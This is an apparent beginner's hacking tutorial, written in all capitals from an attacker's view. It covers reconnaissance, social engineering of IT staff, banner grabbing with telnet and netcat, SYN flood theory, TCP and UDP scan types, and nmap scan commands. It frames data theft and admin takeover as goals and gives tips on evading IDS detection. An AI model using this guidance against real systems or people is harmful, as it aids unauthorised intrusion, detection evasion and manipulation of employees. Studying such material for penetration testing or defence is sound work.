Hacking Website And Server

PREFACE:

THIS TUTORIAL IS MEANT FOR BEGINNERS. ANYHOW, IT MIGHT BE USEFUL FOR INTERMEDIATE/EXPERTS TOO!

I’M GOING TO PROVIDE THE COMMON METHODOLOGY THAT IS FOLLOWED WHEN HACKING A MACHINE/NETWORK/SERVER. THIS TUTORIAL WILL GIVE YOU A GOOD UNDERSTANDING & AN OVERVIEW ABOUT PROFESSIONAL PENETRATION TEST IN A
BLACK BOX (ATTACKER) POINT OF VIEW. IT IS DESIGNED TO GIVE YOU THE IDEA ON HOW AN ATTACKER CAN BREAK INTO YOUR SYSTEM, WHAT AM GONNA SAY WILL INCREASE YOUR AWARENESS & WILL OPEN THE DOOR FOR YOU TO GO OUT & EDUCATE YOURSELF EASILY. I GATHERED THESE INFO FROM VARIOUS SOURCES AND TUTORIALS, I HAVE CHANGED MANY STUFF, CLARIFIED MANY PARTS, GAVE SOME REFERENCES, AND PUT MANY INFORMATION TOGETHER. I’M STILL A LEARNER & ON THE WAY TO MY GOAL. HOWEVER, THIS WON’T PREVENT FROM TEACHING OTHERS WHAT I HAVE LEARNED SO FAR & DON’T WORRY I’M NOT GOING TO PROVIDE YOU ANY INFO THAT I’M NOT SURE ABOUT YET. IT IS NOT THE BEST TUTORIAL OUT THERE, BUT AT LEAST IT IS A GOOD STARTER. I WILL SPEAK IN A HACKER (ATTACKER OR BLACKBOX) POINT OF VIEW. I WRITE THIS TUTORIAL FOR EDUCATIONAL PURPOSES ONLY.

BEFORE YOU HACK A SYSTEM, YOU MUST DECIDE WHAT IS YOUR GOAL. ARE YOU HACKING TO PUT THE SYSTEM DOWN, GAINING SENSITIVE DATA, BREAKING INTO THE SYSTEM AND TAKING THE ‘ROOT’ ACCESS, SCREWING UP THE SYSTEM BY FORMATTING EVERYTHING IN IT, DISCOVER VULNS & SEE HOW YOU CAN EXPLOIT THEM, ETC … THE POINT IS YOU HAVE TO DECIDE THE GOAL.

THE MOST COMMON GOALS ARE:

1. BREAKING INTO THE SYSTEM & TAKING THE ADMIN PRIVILEGES.
2. GAINING SENSITIVE DATA, SUCH AS CREDIT CARDS, IDENTIFICATION THEFT, ETC.

YOU SHOULD HAVE ALL THE TOOLS READY BEFORE YOU START TAKING THE STEPS OF HACKING. THERE IS A *NIX VERSION CALLED BACKTRACK. IT IS AN OS THAT COMES VARIOUS SET OF SECURITY TOOLS THAT HELPS YOU HACKING SYSTEMS (DOING PENETRATION TEST).
YOU SHOULD SET THE STEPS (METHODOLOGY) THAT YOU HAVE TO TAKE IN YOUR JOURNEY. THERE IS A COMMON METHODOLOGY FOLLOWED BY HACKERS I WILL MENTION IT BELOW. HOWEVER, YOU CAN CREATE YOUR OWN METHODOLOGY IF YOU KNOW WHAT U R DOING.

COMMON STEPS TO BE TAKEN FOR HACKING A SYSTEM:

1. RECONNAISSANCE(FOOTPRINTING).
2. SCANNING.
3. PORTS & SERVICES ENUMERATION.
4. VULNERABILITY ASSESSMENT.
5. VULNERABILITY EXPLOITATION.
6. PENETRATION AND ACCESS.
7. PRIVILEGE ESCALATION & OWNING THE BOX.
8. ERASE TRACKS.
9. MAINTAINING ACCESS.
THE ABOVE METHODOLOGY CAN CHANGE REFERRING TO YOUR GOALS. FEEL FREE COMRADES!

BEFORE YOU BREAK INTO A SYSTEM, YOU HAVE TO COLLECT AS MUCH INFO AS YOU CAN. YOU HAVE TO STUDY YOUR TARGET WELL BEFORE YOU HACK. THIS STEP IS CALLED RECONNAISSANCE. RECONNAISSANCE IS ACHIEVED BY YOU USING TECHNIQUES & TOOLS THAT UNDETECTABLE BY A TARGET. YOU ARE GATHERING YOUR TARGET INFO THAT IS PUBLICLY PUBLISHED, E.G. BROWSE YOUR TARGET WEBSITE & IF THEY ARE LOOKING FOR A SQL EMPLOYEE AND WINDOWS SERVER ADMIN, THEN YOU GET A HINT THAT THEY ARE RUNNING WINDOWS SERVER & DO SQL’S, THIS IS CALLED A “PASSIVE” ACTION. LETS AN EXAMPLE OF ACTIVE ACTION! EXAMPLE OF ACTIVE ACTION, CALL THE COMPANY TO OBTAIN SOME INFO, VISIT THE COMPANY, EMAIL EMPLOYEES TO GET SOME INFO, GO TO THE TARGET WEBSITE & READ ITS SOURCE CODE. IN OTHER WORDS, PASSIVE ACTION MEANS YOU GATHER INFO IN NON-INTRUSIVE MANNER. ACTIVE ACTION IS A STEP FURTHER, SUCH AS TALKING TO THE COMPANY AS YOU ARE A CUSTOMER, THINGS LIKE THAT. IT IS NOT REALLY IMPORTANT TO KNOW WHAT ACTION IS PASSIVE & WHAT IS ACTIVE, THE MAIN GOAL HERE TO GATHER INFO! SIMPLE HA? GOOD, LET ME GO DEEPER LITTLE BIT.

IN PASSIVE RECONNAISSANCE, THERE IS 0 CHANCE OF GETTING CAUGHT ;-), AS YOU ONLY TARGET PUBLICLY AVAILABLE INFO TO GIVE YOU THE FEEL ON HOW YOUR TARGET LOOK LIKE. TYPE OF INFO YOU CAN GATHER THROUGH PASSIVE RECON. ARE, NAMES, PHONES NUMBERS, LOCATION ADDRESS, PARTNER NETWORKS, AND MANY MORE. THIS CAN AID YOU WHEN YOU WANT TO DO SOME SOCIAL ENGINEERING! HENCE, SOMETIMES YOU CAN GET SOME NON-PUBLIC INFO IS REVEALED WHEN YOU DO PASSIVE RECONNAISSANCE. THERE ARE SEVERAL TOOLS HELPS YOU TO DO PASSIVE RECONNAISSANCE, SUCH AS WHOIS (WHO IS). WHOIS HELPS YOU OBTAIN EXTENSIVE INFO, SUCH AS NAMES, DOMAINS OF THE TARGET, ETC. OTHER GREAT TOOLS ARE, SAM SPAD, DOMAINTOOLS, AND GOOGLE(CAN REVEAL LOTS OF TARGET SUBDOMIANS & MANY MORE).

ACTIVE RECONNAISSANCE GOES BEYOND THE PASSIVE NATURE, SUCH AS COMMUNICATING WITH TARGET WITHOUT BEING CAUGHT, SUCH AS SCANNING. ANYTHING NOT DISCOVERED IN IDS(INTRUSION DETECTION SYSTEM) IS CONSIDERED ACTIVE. YOU HAVE TO THINK OF WAYS TO EXTRACT INFO OF THE COMPANY IN A NORMAL WAY, PUBLIC WAY BY GOING DEEPER LITTLE BIT THAN PASSIVE RECON. E.G. YOU CAN GO TO THE PHYSICAL LOCATION DO SOME SOCIAL ENGINEERING, EMAIL STAFF, COMMUNICATE WITH EMPLOYEES BASED ON INFO’S YOU HAVE GOT IN PASSIVE RECONS. THINGS LIKE THAT!

EXAMPLE OF SOME TECHNIQUES FOR ACTIVE RECONNAISSANCE, SUCH AS BANNER GRABBING, VIEW COMPANY’S PUBLIC WEBSITE SOURCE CODE AND DIRECTORY STRUCTURE, SOCIAL ENGINEERING, SHOULDER SURFING, ETC.

WHAT THE HECK IS BANNER GRABBING?
YOU LET THE SERVER SENDS YOU A BLOCK OF INFORMATION THAT TELLS YOU OS VERSION OF YOUR TARGET SYSTEM & VARIOUS ASSOCIATION WITH IT. BANNER TELLS OS VERSION N VARIOUS ASSOCIATION. ANYTHING LISTENS ON A “PORT” CAN DETERMINE THE OPERATING SYSTEM (OS) “THE PORT” IS RUNNING ON, THIS CALLED FINGERPRINTING. IN OTHER WORDS, FINGERPRINTING IS THE PROCESS OF DETERMINING THE OPERATING SYSTEM (OS) OR APPLICATIONS USED BY A REMOTE TARGET.

QUOTE:
LEARN MORE ABOUT BANNER GRABBING:
http://WWW.NET-SQUARE.COM/HTTPRINT/HTTPRINT_PAPER.HTML

CAN YOU GIVE A BRIEF EXAMPLE OF SOCIAL ENGINEERING?
FOR EXAMPLE, YOU TRY TO KNOW WHERE IT ADMIN GOES AFTER BUSINESS HOURS, THEN START GO TO THE PLACE HE GOES & BUILD A RELATIONSHIP , START MAKING A FRIEND RELATIONSHIP TO EXTRACT MORE INFO SLOWLY BUT SURELY, THINGS LIKE THAT! YOU KNOW WHAT I MEAN.

WHAT IS SHOULDER SURFING?
SIMPLY, STANDS BEHIND A PERSON SHOULDER AND SEE WHAT THE GUY IS DOING & TYPING ON KEYBOARD. THIS CAN HAPPEN IN WIRELESS NETWORK AREA WHERE EVERYONE IS USING A LAPTOP IN PUBLIC AREAS.

IN SUMMARY, RECONNAISSANCE IS ONE OF THE MOST IMPORTANT STEPS IN HACKING. THE MAIN CONCEPT IS TO GATHER ALL INFO THAT PUBLICLY AVAILABLE OR EASY OBTAINABLE. INFO THAT WE GATHER WILL HELP US IN SOCIAL ENGINEERING AND RESEARCH PURPOSE WHICH WILL LEAD YOU TO VERY CRITICAL INFO ABOUT THE SYSTEM. IT STARTS BY OBTAINING NAMES, PHONES, EMAILS, IP RANGE, DOMAIN STRUCTURE, AND SO ON.

LET ME SHOW YOU HOW BANNER GRABBING IS DONE, TELNET ON YOUR TARGET SERVER ON PORT 80 AS FOLLOWING, GO TO COMMAND LINE OR TERMINAL AND TYPE

TELNET XX.XXX.XXX.XXX 80

NOW CONNECTION IS ESTABLISHED, THAT STUPID SERVER THINKS YOU ARE WEB BROWSER CONNECTED TO IT, IT WAITS YOU TO ENTER COMMANDS SO THE SERVER CAN YOU GIVE YOU INFO ABOUT YOUR REQUEST. IN THIS SITUATION, YOU HAVE TO WRITE A COMMAND THAT SAYS “HEY YOU WEB SERVER, GIVE ME A CONTENT OF SUCN AND SUCH WEBSITE”. HOWEVER, WE DO NOT REALLY WANT TO VISIT THE WEBSITE THROUGH TELNET, DO YOU? YOU CAN JUST GO TO WEB BROWSER & REQUEST THE WEBSITE FROM THERE. OUR PURPOSE HERE IS TO FREAK THE SERVER OUT ENOUGH, SO IT SPITS BACK A CODE THAT SAYS, HEY! THIS DOESN’T WORK BUT HERE IS SOME INFO THAT MIGHT HELP YOU DO SOME TROUBLE SHOOTING. THIS TECHNIQUE ALLOWS YOU TO FINGER PRINT VARIOUS COMPONENT OF THE TARGET SYSTEM.

NOTE: INSTEAD TELNET XXX.XX.XXX.XX 80, YOU CAN DO NC XXX.XX.XXX.XXX 80! SAME THING … NC STANDS FOR NETCAT … XX.XXX.XX.XXX REPRESENTS IP ADDRESS OF THE TARGET SYSTEM.

AFTER YOU DO TELNET XXX.XX.XXX.XXX 80, THE REMOTE SEVER WILL WAIT YOU TO ENTER A COMMAND.

TYPE THIS:

HEAD / HTTP/1.0

THEN YOU WILL GET A REPLY LOOKS SIMILAR TO WHAT YOU SEE IN THIS LINK:

http://WWW.NET-SQUARE.COM/HTTPRINT/HTTPRINT_PAPER.HTML

OK, YOU GET IT NOW?

LETS SAY OUR TARGET GOT THE FOLLOWING VERSION: THE SERVER RUNS: APACHE/1.3.41 IN UNIX BOX, RUNNING PHP/4.4.8

AT THIS POINT IF YOU KNOW ANY VULNERABILITY FOR THIS PARTICULAR OS OR THIS PARTICULAR APACHE OR PHP. YOU CAN START DOING THE EXPLOITATION PROCESS 😉 …

ANOTHER EXAMPLE, USE PROGRAM CALLED SAM-SPADE WHICH GIVES YOU ALOT OF THE INFO ABOUT YOUR TARGET. THE TARGET DOES NOT KNOW ACTUALLY WHAT WE ARE DOING AGAINST THEIR SERVER, SINCE THEY HAVEN’T SEEN ANYTHING BEEN TRIGGERED BY IDS OR FIREWALL.
*WHAT IS THE DIFFERENCE BETWEEN IDS & FIREWALL?
AN IDS (INTRUSION DETECTION SYSTEM) MAY ONLY DETECT AND WARN YOU OF A VIOLATION OF YOUR PRIVACY. ALTHOUGH MOST BLOCK MAJOR ATTACKS, SOME PROBES OR OTHER ATTACKS MAY JUST BE NOTED AND ALLOWED THROUGH. THERE’S ALSO AN EVOLUTION OF THE IDS CALLED AN IPS (INTRUSION PREVENTION SYSTEM) THAT WATCHES FOR THE SAME THINGS AN IDS DOES, BUT INSTEAD OF JUST ALERTING, IT BLOCKS THE TRAFFIC.

A GOOD FIREWALL WILL BLOCK ALMOST ALL ATTACKS UNLESS SPECIFIED OTHERWISE OR DESIGNED OTHERWISE. THE ONLY PROBLEM IS, THE FIREWALL MIGHT NOT WARN YOU OF THE ATTACKS AND MAY JUST BLOCK THEM.

IT MAY BE A GOOD IDEA TO HAVE BOTH AN IDS AND A FIREWALL, BECAUSE THE IDS WILL WARN YOU AND THEN THE FIREWALL WILL BLOCK THE ATTACK. OVER THE YEARS, FIREWALLS GOT MORE COMPLEX AND ADDED MORE FEATURES. ONE OF THESE FEATURES IS ACTUALLY IDS – TODAY YOU CAN HAVE A FIREWALL THAT ALREADY HAS ID(FIREWALL/IDS’S ARE COMBINED INTO ONE INTERNET SECURITY PROGRAM).

LEARN MORE ABOUT BANNER GRABBING:
http://WWW.NET-SQUARE.COM/HTTPRINT/HTTPRINT_PAPER.HTML

TO LEARN HOW TO DO THROUGH GOOGLE, YOU NEED LIKE THE FOLLOWING BOOK:
HTTP://WWW.AMAZON.COM/EXEC/OBIDOS/ASIN/ … /REF=NOSIM

NOTE: THE BOOK IN AMAZON IS JUST AN EXAMPLE FOR YOU TO GIVE YOU AN IDEA OF WHAT KIND OF BOOK YOU SHOULD BE LOOKING FOR – IF YOU ARE INTERESTED.

ALRIGHT, NOW YOU AT LEAST HAVE AN IDEA OF WHAT RECONNAISSANCE IS! LETS TALK ABOUT SCANNING…

WHEN YOU SCAN YOUR TARGET’S NETWORK, YOU ACTUALLY START TOUCHING THE SYSTEM. SCANNING A NETWORK DETERMINES WHATS IN THERE, SCANNING NETWORK GIVES YOU THE FEEL HOW IS YOUR TARGET NETWORK IS LAID OUT SUCH AS IF THERE ARE MULTIPLE SUBNETS, WHICH HOSTS ARE ALIVE, CHECK PORTS, SEE IF SYSTEM IS ALIVE, DISCOVER AVAILABLE HOSTS & GET INFO ABOUT THE DISCOVERED HOSTS. THERE ARE THOUSANDS OF TOOLS CAN BE USED TO SCAN NETWORKS! SCANNING A NETWORK CAN EASILY GET PICKED UP BY IDS. ANYHOW, NO ONE WILL PAY ATTENTION EXCEPT IF YOU DO IT OVER AND OVER BECAUSE SCANS HAPPENS ON SUCH A REGULAR BASIS ON THE INTERNET. THEREFORE, PEOPLE WHO READ THE LOGS, I MEANS THE WEBMASTER WON’T REALLY PAY ATTENTION TO EVERY SINGLE SCAN OCCURS, SO YOU DON’T HAVE TO WORRY A LOT. THERE ARE WAYS TO AVOID BEING PICKED UP BY IDS :-). AFTER YOU FINISH SCANNING, YOU WILL GAIN A LIST OF NETWORK NODES THAT EXISTS THERE.

“NODE” IS AN ACTIVE ELECTRONIC DEVICE THAT IS ATTACHED TO A NETWORK, AND IS CAPABLE OF SENDING, RECEIVING, OR FORWARDING INFORMATION OVER A COMMUNICATIONS CHANNEL. IF YOU WANT TO LEARN MORE, GOOGLE IT OR VISIT HTTP://EN.WIKIPEDIA.ORG/WIKI/NODE_(NETWORKING) …

OK NOW WE WANT TO DISCOVER LIVE HOSTS VIA SCANNING. THIS IS THE FIRST ACTION TAKEN AGAINST YOUR TARGET NETWORK NETWORK. DEPENDING ON METHOD OF SCANNING YOU USE, YOU CAN BE DETECTED BY IDS. MOST ADMINS WILL IGNORE DETECTIONS BECAUSE IT HAPPENS A LOT UNLESS SOMETHING ABNORMAL HAPPENS.

THERE ARE VARIOUS SCANNER TOOLS, E.G. NMAP, SUPERSCAN, AND MANY MORE. THERE ARE VARIOUS SCAN METHODS, SOME ARE STEALTHY, OTHERS ARE NOT.

BEFORE I TALK ABOUT VARIOUS SCANNING METHODS, LET ME EXPLAIN TO YOU ABOUT TCP CONNECTIONS BASICS. WHEN YOU SCAN YOUR TARGET USING TCP COMMUNICATION, THERE ARE SIX TCP FLAGS CAN BE UTILIZED DURING PACKET TRANSMISSION(PACKETS GET TRANSMITTED DURING SCANNING PROCESS). A FLAG WILL INDICATE WHETHER THE SENT PACKETS ARE SYN, ACK, FIN, URG, PSH, OR RST PACKETS. THESE PACKETS SETS YOU IN A POSITION ON HOW YOU WANT TO COMMUNICATE WITH THE REMOTE HOST. YOU CAN GET DIFFERENT INFO DEPENDING ON THE FLAG YOU CHOOSE FOR THE SCANNING.

TCP ESTABLISHES THREE HANDSHAKES, SYN, SYN-ACK, ACK. WHAT ARE THEY?
WHEN YOU SCAN YOUR TARGET USING TCP COMMUNICATION, YOU SEND A SYN PACKET(SYN REQUEST), AND THEN TARGET SENDS YOU BACK AN ACK PACKET WITH SYN PACKET. NOW, YOU SEND AN ACK PACKET TO THE TARGET. SO NOW BOTH MACHINES ESTABLISH THE CONNECTION WELL, LIKE THEY HAVE MADE A WELL ESTABLISHED TUNNEL FOR A PROPER GUARANTEED COMMUNICATION WITHOUT LOSING ANY PACKETS DURING COMMUNICATING WITH EACH OTHER. A HACKER CAN GET CAUGHT EASILY IF HE USES THIS METHOD TO HACK OTHER SYSTEMS ILLEGALLY.

HACKERS USE NON-STANDARD COMBINATION OF THESE SIX FLAGS, WHICH GIVES THEM INFO THAT ARE NOT NORMALLY AVAILABLE TO THE PUBLIC.

HAVE YOU HEARD ABOUT SYN FLOOD?
SYN FLOOD IS DONE BY UTILIZING THREE HANDSHAKE BY SENDING “SYN” REQUEST TO THE TARGET, SO THE TARGET RECEIVES A SYN REQUEST AND SEND AN A SYN-ACK BACK TO THE ORIGINATOR(YOU). YOU IGNORE THE TARGET SYN-ACK REQUEST – WHEN YOU IGNORE IT, THEN THE THREE HANDSHAKES IS NOT COMPLETED, THIS IS CALLED HALF OPEN TCP CONNECTION – IN THEORY, WHEN THE TARGET SENDS YOU SYN-ACK, THE TARGET ALLOCATES SOME RAM ON ITS MACHINE.

THE AMOUNT OF RAM ON THE TARGET MACHINE MUST BE OPEN UNTIL IT GETS RESPONSE (ACK PACKET) BACK FROM YOU BECAUSE TILL NOW ONLY TWO HANDSHAKE HAS BEEN MADE,SO THE TCP CONNECTION PROCESS IS NOT COMPLETED YET. HOWEVER, THERE IS ALWAYS A TIME LIMIT FOR THE RAM TO BE OPENED, SO IF 30 SECS PASSED BY & THE TARGET DID NOT GET THE ACK FROM YOU, THE CONNECTION WILL ABORT(FAILED TCP HANDSHAKE – TIMEOUT) & RAM WILL BE REALLOCATED.

THE IDEA HERE IS TO SEND HELL A LOT OF PACKETS IN FEW SECS SO IN 30 SECS, YOU CAN SEND 40 MILLION PACKETS(LETS SAY ONE PACKET SIZE IS 1KB) WHICH IS HEAVY ON THE RAM SINCE THE RAM MIGHT NOT HAVE ENOUGH MEMORY TO CARRY 40 MILLION PACKETS. THEREFORE, YOU FORCE THE TARGET TO MAKE HALF OPEN TCP CONNECTION ATTEMPTS, SO DEFINITELY THE TARGET MACHINE WILL STOP RESPONDING TO LEGITIMATE REQUEST. IN OTHER WORDS, IF YOU SEND 40 MILLION SYN REQUESTS TO THAT REMOTE HOST, IT’S GOING TO ALLOCATE A HELL OF A LOT OF RAM FOR THOSE REQUESTS. AFTER A WHILE, IT’S GOING TO EAT UP ALL OF THE RAM. THUS, TARGET SYSTEM GOES DOWN. THIS IS CALLED SYN FLOOD ATTACK.

IN SHORT, SYN FLOOD ATTACK MAKES THE SYSTEM (I.E. THE IP STACK OR KERNEL) CHOKES ON THE MEMORY ALLOCATIONS (OR SIMPLY RUNS OUT OF MEMORY) OR THE TARGET APPLICATION (I.E. WEB SERVER) CHOKES ON THE PROCESSING LOAD. YOU GOT IT? OR NOT YET?! SYN FLOOD IS AN OLD TECHNIQUE I JUST MENTIONED IT HERE FOR ILLUSTRATION PURPOSES.

GENERAL INFORMATION: THESE DAYS, SYN FLOODS ARE USED TO MAKE SYSTEMS INACCESSIBLE. THEY HAVE A LIMITED NUMBER OF HALF OPEN CONNECTIONS, YOU USE THEM ALL, AND THEY CAN’T ACCEPT ANY MORE SYNS. BUT AGAIN, MODERN SOFTWARE THROWS AWAY OLD SYNS ONCE THE LIMIT IS REACHED. NOTE THAT DIFFERENT SYSTEMS WILL BEHAVE DIFFERENTLY.

IF YOU INTERESTED IN LEARNING MORE ABOUT SYN FLOOD, VISIT
http://TOOLS.IETF.ORG/HTML/RFC4987
LETS TALK ABOUT THE MOST COMMON TCP SCAN TYPES. THERE ARE FULL SCAN, HALF OPEN SCAN, STEALTH SCAN, XMAS SCAN, AND ACK SCAN.

FULL SCAN: THIS COMPLETES 3 WAY TCP. IT IS THE MOST EFFECTIVE & GIVES MORE ACCURATE RESULTS. HOWEVER, IT IS NOT SAFE AND EASILY TRACED AND DETECTED.

HALF OPEN SCAN: IT IS THE SECOND MOST EFFECTIVE SCANNING METHOD, ONLY USES FIRST PART OF THE HANDSHAKE TO GET SYN-ACK BUT DOES NOT SEND 3RD PART (ACK) BACK TO THE REMOTE HOST. THE IDEA HERE IS IF THE REMOTE REPLIES BACK TO YOU AFTER YOU HAVE SENT SYN REQUEST, THIS MEANS THE PORT – WE SENT THE SYN TO – MUST BE OPEN.

STEALTH SCAN: THE IDEA HERE IS TO SCAN PORTS RANDOMLY(NOT IN SEQUENTIAL ORDER) & REDUCE THE SPEED OF SCANNING. IF YOU SCAN ALL PORT FROM 1 TO 65536 IN SEQUENCE, YOUR MORE VISIBLE TO BE DETECTED, AND USUALLY SCANNING HAPPENS SO FAST, WHICH IS UNUSUAL SINCE REGULAR PROGRAM DOES NOT CONNECT TO PORT THAT FAST, SO THIS CAN MAKE IT EASIER TO BE DETECTED. THEREFORE YOU HAVE TO SCAN PORTS RANDOMLY & REDUCE THE SPEED OF SCANNING. TO AVOID IDS, YOU SHOULD NOT USE FULL CONNECTION SCAN WITH STEALTH SCAN, YOU CAN USE HALF-OPEN SCAN(SYN). SYN IS CONSIDERED A STEALTH SCAN. IN FACT, SYN SCAN IS CALLED SYN-STEALTH SCAN, OR YOU CAN USE XMAS SCAN WITH STEALTH SCAN WHICH HELPS YOU TO EVADE DETECTION, THINGS LIKE THAT! YOU GET MY POINT I GUESS.

XMAS SCAN: USES FIN, URG, AND PUSH FLAGS WHICH ARE USED TO BYPASS SOME FIREWALLS. XMAS SCAN WORKS WITH UNIX SYSTEM, IT DOES NOT WORK WITH WINDOWS SYSTEM.

ACK SCAN: THIS HELPS YOU EVADING IDS NOT TO GET YOU DETECTED. YOU SEND ONLY AN ACK PACKET TO YOUR TARGET, YOUR TARGET WON’T KNOW HOW TO DEAL WITH IT SINCE THERE WAS NO HANDSHAKE. THUS, ACK SCAN CAUSES OPEN PORTS IN YOUR TARGET MACHINE TO RETURN A RESET PACKET(RST), RST PACKET GIVES YOU A HINT THAT THE PORT OR SERVICE IS NOT FILTERED BETWEEN POINT A AND POINT B, WHICH USUALLY FIREWAL RESIDES IN BETWEEN! SINCE THE PORT REPLIED YOU WITH RST PACKET THIS MEANS THERE IS NO FIREWALL BETWEEN A(YOUR MACHINE) & B(PORT OR SERVICE ON THE TARGET MACHINE) AND RST PACKET ALSO GIVES YOU AN INSIGHT THAT THE TARGET PORT IS OPEN ;-). IF THERE IS A FIREWALL, YOUR ACK PACKET WOULD NOT REACH TO THE TARGET PORT & BECAUSE OF THAT YOU WON’T GET ANY RST PACKET. IN ADDITION, RST PACKET HELPS YOU INDENTIFY WHAT SYSTEM IS RUNNING ON THE REMOTE HOST.

THESE ARE THE MOST COMMON METHOD OF SCANS, THERE ARE HUNDREDS OF SCANNING METHODS! NMAP ALLOWS YOU TO SET YOUR OWN CUSTOM SCAN TYPE E.G. INSTEAD OF SENDING ACK FLAGS ONLY, YOU CAN SEND ACK FLAG AND RST FLAG TOGETHER AND SEE WHAT YOU GET BACK FROM TARGET …

OK! WE HAVE TALKED ABOUT HOW TCP SCANNING WORKS IN GENERAL. NOW, I WILL BE TALKING ABOUT UDP & ICMP SCANNING … UDP AND ICMP CONNECTIONS MOST OF THE TIMES ARE BLOCKED AT THE FIREWALL LEVEL & EVEN AT THE HOST LEVEL IN SOME CASES. WE ARE GOING TO SCAN ON HOSTS & PORTS THAT RESPOND VIA UDP. WHEN YOU SCAN YOUR TARGET VIA UDP, THERE ARE MANY PROBLEM WILL OCCUR DURING THAT PROCESS E.G. YOU CAN SCAN OVER THE PORTS VIA UDP, ASSUME YOU SCANNED PORT 1, AND PORT 1 IS CLOSED, THEN HOST WILL SEND ICMP UNREACHABLE BACK TO YOU, WHICH GIVES AN INSIGHT THAT PORT IS CLOSED BECAUSE YOU DIDN’T GET ANY UDP RESPONSE BACK FROM TARGET! MAKING SENSE,RIGHT? UNFORTUNATELY, WE WILL NEVER GET A RESPONSE BACK FROM TARGET TO ENSURE YOU THAT PORT IS OPEN!

THATS HOW UDP CALL WORKS, SEND THE PACKET & FORGET IT. LETS SAY WE COME ACROSS PORT 21, AND 21 IS OPEN, THEN PORT 21 ON TARGET MACHINE WILL NOT REPLY BACK TO YOU BECAUSE UDP DOES NOT GIVE YOU THE GUARANTEE THE DELIVERY PACKETS DURING COMMUNICATION PROCESS, IT JUST SEND THE PACKET AND FORGET, UNLIKE TCP WHICH GUARANTEES THE DELIVERY OF PACKETS WITH NO LOSS OR CORRUPTION. SINCE WE DIDN’T GET REPLY BACK, THEN WE CAN ASSUME THE PORT 21 IS OPEN *OR* MAYBE PORT 21 IS CLOSED AND ICMP REPLY GOT LOST SOMEWHERE SO WE DIDN’T GET IT! A GENERAL RULE, WHEN YOU DON’T GET A REPLY YOU ASSUME PORT IS OPEN.

SOME HIGH PROFESSIONALS SECURITY PERSON PURPOSELY CONFIGURE PORTS TO NOT TO RESPOND A UDP SCANNING. ICMP SCANNING IS AS SAME AS UDP. ICMP SCANNING IS NOISY & CAN BE PICKED BY IDS VERY EASILY BECAUSE ICMP SENDS RANDOM SEVERAL PINGS TO THE NETWORK INSTEAD OF A SINGLE HOST(ICMP SCANNING DOES A ‘PING SCANNING’ – SENDS ICMP PACKETS – TO THE WHOLE NETWORK INSTEAD OF A SINGLE HOST). AFTER YOU FINISH ICMP SCANNING, BASED ON THE REPLIES YOU GET BACK FROM THE LIVE HOSTS, THEN YOU CAN DETERMINE THAT YOUR TARGET NETWORK IS LISTENING FOR ICMP TRAFFIC AND YOU MIGHT TO DO SOME EXPLOIT BASED ON THAT. UNFORTUNATELY, THERE AREN’T ALOT OF ICMP EXPLOITS GOING AROUND, SO YOU ARE JUST GOING TO USE ICMP FOR NETWORK ENUMERATION, YOU JUST DO IT TO SEE WHAT HOSTS ARE UP, HOST A IS UP , HOST B IS UP & HOST C IS UP, THEY ARE REPLYING FOR MY ICMP. THUS, THIS LET US KNOW THESE 3 HOSTS ARE RUNNING ON THE TARGETED NETWORK AND POTENTIALLY CAN BE A TARGET FOR US. IDS’S ARE ALWAYS LISTENING FOR NETWORK SCANS & ALOT OF NETWORK SCANNERS PROVIDE A SUPPORT FOR ICMP SCANNING, BUT DO NOT HAVE A WAY TO MAKE IT STEALTHY! THEREFORE, ICMP CAN TURN ON THE IDS ALERT WHICH TELLS THE SECURITY PERSON THERE IS SOMEBODY SCANS YOUR WHOLE NETWORK.

NMAP IS A GREAT TOOL THAT IS VERY POPULAR, IT IS USUALLY USED TO SCAN NETWORKS, HOSTS, PORTS, AND DOES A LOT OF OTHER STUFF. IT IS VERY INTRUSIVE TOOL AND CONSIDERED A HACKING TOOL. USING NMAP AGAINST SYSTEMS YOU DONT OWN OR DON’T HAVE PERMISSION TO SCAN CAN BE CONSIDERED ILLEGAL. LETS SEE EXAMPLES OF SOME SCANNING METHOD!

EXAMPLE OF ICMP SCANNING(-SP) – THIS IS CALLED PING SCAN

NMAP -V -SP XX.XXX.XXX.XX > FILENAME

NMAP: REPRESENTS THE PROGRAM WE ARE RUNNING WHICH NMAP.
-V: FOR INCREASED VERBOSITY, WHICH MEANS BRING ME EXTRA DETAILS OF THE TARGETED SYSTEM. (OPTIONAL – AS FAR AS I KNOW)
-SP: THE FLAG THAT DETERMINES THE SCANNING METHOD.
X’S: TARGET IP ADDRESS.
> FILENAME: OUTPUT THE RESULTS TO THE NEWLY SPECIFIED FILENAME. IN OTHER WORDS, SAVE RESULTS IN A FILE (OPTIONAL)

THIS ABOVE COMMAND SHOWS YOU THE SYSTEMS THAT ARE UP AND RUNNING, SO THIS SHOWS WHAT AVAILABLE TO US ON THE TARGETED NETWORK. AS A RESULT, YOU WILL GET SIMPLE INFO THAT SHOWS YOU THERE ARE NUMBER OF IP ADDRESSES THAT RESPONDED TO PING REQUEST – NOTE: THERE COULD BE A LOT MORE MACHINES OUT THERE THAT ARE NOT RESPONDING TO ICMP SCANNING.

LETS SEE AN EXAMPLE OF UDP SCAN, UDP SCAN NOT SO SPEED.

NMAP -V -SU XX.XXX.XXX.XX

RESULTS OF UDP SCAN(-SU) GIVE MORE INFO THAN PING SCAN(-SP). KEEP IN MIND THERE COULD BE HUNDREDS OF OTHER PORTS ARE LISTENING ON THE SYSTEM WHICH SIMPLY DON’T RESPOND TO UDP CONNECTION.

USEFUL SOURCES RELATES TO SCANNING METHODS VIA NMAP:

Click to access NMAP-TUTORIAL.PDF

http://WWW.PETRI.CO.IL/PORT-SCANNING-WITH-NMAP.HTM
ALRIGHT, NOW YOU HAVE A GOOD BASIC UNDERSTANDING ABOUT SCANNING! NEXT, I WILL BE TALKING ABOUT FINGERPRINTING! SO KEEP LEARNING 🙂

